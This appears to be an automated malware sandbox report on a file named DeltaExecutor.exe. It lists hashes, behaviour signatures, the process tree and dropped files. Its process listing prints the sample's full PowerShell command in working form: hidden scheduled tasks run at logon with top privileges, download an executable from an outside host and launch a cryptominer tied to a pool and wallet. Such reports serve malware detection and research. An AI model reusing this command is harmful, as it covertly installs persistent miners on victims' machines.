Overview
overview
8Static
static
3DeltaExecutor.zip
windows7-x64
1DeltaExecutor.zip
windows10-2004-x64
1DeltaExecutor.exe
windows7-x64
8DeltaExecutor.exe
windows10-2004-x64
8System.Col...ns.dll
windows7-x64
1System.Col...ns.dll
windows10-2004-x64
1System.Com...es.dll
windows7-x64
1System.Com...es.dll
windows10-2004-x64
1System.Console.dll
windows7-x64
1System.Console.dll
windows10-2004-x64
1System.Dia...ss.dll
windows7-x64
1System.Dia...ss.dll
windows10-2004-x64
1System.Linq.dll
windows7-x64
1System.Linq.dll
windows10-2004-x64
1System.Memory.dll
windows7-x64
1System.Memory.dll
windows10-2004-x64
1System.Pri...ib.dll
windows7-x64
1System.Pri...ib.dll
windows10-2004-x64
1System.Run...es.dll
windows7-x64
1System.Run...es.dll
windows10-2004-x64
1System.Runtime.dll
windows7-x64
1System.Runtime.dll
windows10-2004-x64
1System.Tex...ns.dll
windows7-x64
1System.Tex...ns.dll
windows10-2004-x64
1System.Thr...ad.dll
windows7-x64
1System.Thr...ad.dll
windows10-2004-x64
1System.Threading.dll
windows7-x64
1System.Threading.dll
windows10-2004-x64
1WinUpdateH...s.json
windows7-x64
3WinUpdateH...s.json
windows10-2004-x64
3WinUpdateHelper.exe
windows7-x64
1WinUpdateHelper.exe
windows10-2004-x64
1Resubmissions
01-01-2025 20:08
250101-yw3eystrcl 801-01-2025 20:04
250101-ytbt8a1qe1 801-01-2025 20:01
250101-yrhvra1pgx 801-01-2025 14:10
250101-rgpf8axnaw 10Analysis
-
max time kernel
148s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
01-01-2025 20:01
Static task
static1
Behavioral task
behavioral1
Sample
DeltaExecutor.zip
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
DeltaExecutor.zip
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
DeltaExecutor.exe
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
DeltaExecutor.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
System.Collections.dll
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
System.Collections.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
System.ComponentModel.Primitives.dll
Resource
win7-20240708-en
Behavioral task
behavioral8
Sample
System.ComponentModel.Primitives.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
System.Console.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
System.Console.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
System.Diagnostics.Process.dll
Resource
win7-20241010-en
Behavioral task
behavioral12
Sample
System.Diagnostics.Process.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
System.Linq.dll
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
System.Linq.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
System.Memory.dll
Resource
win7-20240729-en
Behavioral task
behavioral16
Sample
System.Memory.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
System.Private.CoreLib.dll
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
System.Private.CoreLib.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
System.Runtime.InteropServices.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
System.Runtime.InteropServices.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
System.Runtime.dll
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
System.Runtime.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
System.Text.Encoding.Extensions.dll
Resource
win7-20241010-en
Behavioral task
behavioral24
Sample
System.Text.Encoding.Extensions.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
System.Threading.Thread.dll
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
System.Threading.Thread.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
System.Threading.dll
Resource
win7-20240729-en
Behavioral task
behavioral28
Sample
System.Threading.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
WinUpdateHelper.deps.json
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
WinUpdateHelper.deps.json
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
WinUpdateHelper.exe
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
WinUpdateHelper.exe
Resource
win10v2004-20241007-en
General
-
Target
DeltaExecutor.exe
-
Size
169KB
-
MD5
a614a895161a44b174f8b0c5e0d94adf
-
SHA1
1594a374c81ee36ce6dcff56f13169c4400b8714
-
SHA256
d6f67c596a3017fab0f6908f38de0f996fe8742dc7131d491343d128d96564f6
-
SHA512
3e7f9116b528ff8a2aef56f006f8f5c231dcd0fd3e951ce4b3a0582a4429836bcded1469ba7c3ff41d59bafcee05d77150ced675c8b9fe69f17ff734de5ee981
-
SSDEEP
3072:nczkitvo4BpYN/6mBPry8TXROLdW5m4mUR59OOGJ0kA30165M1fSV:nA4NCmBPry/N2lOOYg0kWE
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 3284 powershell.exe 3284 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-940901362-3608833189-1915618603-1000\{BDB45765-097B-4D09-BC6B-AF420B0A3B4A} msedge.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 3284 powershell.exe 3284 powershell.exe 2384 msedge.exe 2384 msedge.exe 3512 msedge.exe 3512 msedge.exe 4732 msedge.exe 4732 msedge.exe 912 identity_helper.exe 912 identity_helper.exe 1668 msedge.exe 1668 msedge.exe 1668 msedge.exe 1668 msedge.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3284 powershell.exe Token: SeIncreaseQuotaPrivilege 3284 powershell.exe Token: SeSecurityPrivilege 3284 powershell.exe Token: SeTakeOwnershipPrivilege 3284 powershell.exe Token: SeLoadDriverPrivilege 3284 powershell.exe Token: SeSystemProfilePrivilege 3284 powershell.exe Token: SeSystemtimePrivilege 3284 powershell.exe Token: SeProfSingleProcessPrivilege 3284 powershell.exe Token: SeIncBasePriorityPrivilege 3284 powershell.exe Token: SeCreatePagefilePrivilege 3284 powershell.exe Token: SeBackupPrivilege 3284 powershell.exe Token: SeRestorePrivilege 3284 powershell.exe Token: SeShutdownPrivilege 3284 powershell.exe Token: SeDebugPrivilege 3284 powershell.exe Token: SeSystemEnvironmentPrivilege 3284 powershell.exe Token: SeRemoteShutdownPrivilege 3284 powershell.exe Token: SeUndockPrivilege 3284 powershell.exe Token: SeManageVolumePrivilege 3284 powershell.exe Token: 33 3284 powershell.exe Token: 34 3284 powershell.exe Token: 35 3284 powershell.exe Token: 36 3284 powershell.exe Token: SeIncreaseQuotaPrivilege 3284 powershell.exe Token: SeSecurityPrivilege 3284 powershell.exe Token: SeTakeOwnershipPrivilege 3284 powershell.exe Token: SeLoadDriverPrivilege 3284 powershell.exe Token: SeSystemProfilePrivilege 3284 powershell.exe Token: SeSystemtimePrivilege 3284 powershell.exe Token: SeProfSingleProcessPrivilege 3284 powershell.exe Token: SeIncBasePriorityPrivilege 3284 powershell.exe Token: SeCreatePagefilePrivilege 3284 powershell.exe Token: SeBackupPrivilege 3284 powershell.exe Token: SeRestorePrivilege 3284 powershell.exe Token: SeShutdownPrivilege 3284 powershell.exe Token: SeDebugPrivilege 3284 powershell.exe Token: SeSystemEnvironmentPrivilege 3284 powershell.exe Token: SeRemoteShutdownPrivilege 3284 powershell.exe Token: SeUndockPrivilege 3284 powershell.exe Token: SeManageVolumePrivilege 3284 powershell.exe Token: 33 3284 powershell.exe Token: 34 3284 powershell.exe Token: 35 3284 powershell.exe Token: 36 3284 powershell.exe Token: SeIncreaseQuotaPrivilege 3284 powershell.exe Token: SeSecurityPrivilege 3284 powershell.exe Token: SeTakeOwnershipPrivilege 3284 powershell.exe Token: SeLoadDriverPrivilege 3284 powershell.exe Token: SeSystemProfilePrivilege 3284 powershell.exe Token: SeSystemtimePrivilege 3284 powershell.exe Token: SeProfSingleProcessPrivilege 3284 powershell.exe Token: SeIncBasePriorityPrivilege 3284 powershell.exe Token: SeCreatePagefilePrivilege 3284 powershell.exe Token: SeBackupPrivilege 3284 powershell.exe Token: SeRestorePrivilege 3284 powershell.exe Token: SeShutdownPrivilege 3284 powershell.exe Token: SeDebugPrivilege 3284 powershell.exe Token: SeSystemEnvironmentPrivilege 3284 powershell.exe Token: SeRemoteShutdownPrivilege 3284 powershell.exe Token: SeUndockPrivilege 3284 powershell.exe Token: SeManageVolumePrivilege 3284 powershell.exe Token: 33 3284 powershell.exe Token: 34 3284 powershell.exe Token: 35 3284 powershell.exe Token: 36 3284 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3696 wrote to memory of 3512 3696 DeltaExecutor.exe 85 PID 3696 wrote to memory of 3512 3696 DeltaExecutor.exe 85 PID 3512 wrote to memory of 3544 3512 msedge.exe 86 PID 3512 wrote to memory of 3544 3512 msedge.exe 86 PID 3696 wrote to memory of 3284 3696 DeltaExecutor.exe 87 PID 3696 wrote to memory of 3284 3696 DeltaExecutor.exe 87 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 3464 3512 msedge.exe 89 PID 3512 wrote to memory of 2384 3512 msedge.exe 90 PID 3512 wrote to memory of 2384 3512 msedge.exe 90 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91 PID 3512 wrote to memory of 4516 3512 msedge.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\DeltaExecutor.exe"C:\Users\Admin\AppData\Local\Temp\DeltaExecutor.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://igk.filexspace.com/getfile/QDJEILD?title=DependencyCore&tracker=erg12⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3512 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbcd2a46f8,0x7ffbcd2a4708,0x7ffbcd2a47183⤵PID:3544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:23⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:2384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:83⤵PID:4516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:13⤵PID:3448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:13⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:13⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:13⤵PID:996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5248 /prefetch:83⤵PID:1320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5188 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:83⤵PID:3644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:13⤵PID:1036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:13⤵PID:3240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:13⤵PID:5080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:13⤵PID:1832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,13621407782715739594,14327680486581759995,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3836 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:1668
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -ExecutionPolicy Bypass -Command "Register-ScheduledTask -TaskName MicrosoftConsoleSetup -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"New-Item -Path \\.\C:\ProgramData\Con\ -ItemType Directory; (Get-Item \\.\C:\ProgramData\Con\).Attributes = ''ReadOnly, Hidden, System''; Invoke-WebRequest -Uri https://evilmods.com/api/nothingtoseehere.exe -OutFile C:\ProgramData\Con\services.exe; Set-ScheduledTask -TaskName MicrosoftConsole -Trigger (New-ScheduledTaskTrigger -AtLogOn); Unregister-ScheduledTask -TaskName MicrosoftConsoleSetup -Confirm:$false; Start-ScheduledTask -TaskName MicrosoftConsole;\"') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force; Register-ScheduledTask -TaskName MicrosoftConsole -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"C:\ProgramData\Con\services.exe --algo AUTOLYKOS2 --pool erg.2miners.com:18888 --user bc1qyy0cv8snz7zqummg0yucdfzpxv2a5syu7xzsdq.Epydp5gHCt --tls on --log off\"') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3284
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2228
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1268
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5e55832d7cd7e868a2c087c4c73678018
SHA1ed7a2f6d6437e907218ffba9128802eaf414a0eb
SHA256a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574
SHA512897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f
-
Filesize
152B
MD5c2d9eeb3fdd75834f0ac3f9767de8d6f
SHA14d16a7e82190f8490a00008bd53d85fb92e379b0
SHA2561e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66
SHA512d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize144B
MD5e994ea186c351a2c26132db78d096228
SHA1f9edb2312981354d6caafc1a5717021fdc4b3db5
SHA2569fabefd0747e851c9961e220a28ae352de592e22a2d9500651b3b0a42532289e
SHA5128b892573157009c9f2e35cd0bba5deea336b67d5256adda267f9a84b459c76290211ff8a7facaad32a1bcede3c15f0d2b3c6ccd78a7a805bb88f4619abd6c4e0
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
1KB
MD525250fb88dcd9e03f62a63fff0f89502
SHA1ca8e3a3e0652641ff3310e778bb1047e04fa0ca6
SHA2560d4181e2cff0d56601228d5747fb1aed587eba07a9ee91e158ac43b037a6e286
SHA51245f78f72c94cfd533eb01f34bf6ae690907daa1de797af6c89060be41a035aeb58e0d01f7d8be03a93afc17ee6e8194e1e11a970901c5d27ec9f2e9bae0c7470
-
Filesize
6KB
MD55ce920e95b9260676b0af7b4ec20eab8
SHA196abf98addeb3742e7deefad6b9b307e706aabe6
SHA256e816cf8db3aeb76fdcb4959ef111f2ebcd190b2687416426954d940b8e4ed490
SHA512f11c588636aa9cb8db48f5fd4a4bf26399a7346daff4a5ead33d861dd59908593f7a10e28b93014b2a4987ae7f82dc4684dd1cbdec76b6e469331ed83d229cf3
-
Filesize
5KB
MD5460701bcf09ff103752a0496af78693f
SHA1d994875b466a81fb3b0edd57d5888e464f8585df
SHA256f95e48c60d03788118a00dd2c831e11db981e11a6f379c3e4402cbe557371bea
SHA512550b5763d0ba9e5a936cbd963efb822c7e32632ac3d1d845cfbaba46654637802e8d7379ded6059645c5e737a69c4a936424115d72b56b8c4ebfa25f40e59516
-
Filesize
6KB
MD5ed012270e9cb19da0a4d71e760aaa6d6
SHA1743d084c1abe6cf7646ff04defc7fc8ee6b722c7
SHA2568ea76622e98de602f2e1e9a3e3f43f701c882ea231f468a08def13931d9019f7
SHA51221bb06455205b535d5e758156603694a65fabb4538a7cecd0dff493ffbce2efc3451d89c09f9f1bedf9942448449f57d0204ab9b07f7acd6e6a7818d5a5388f3
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
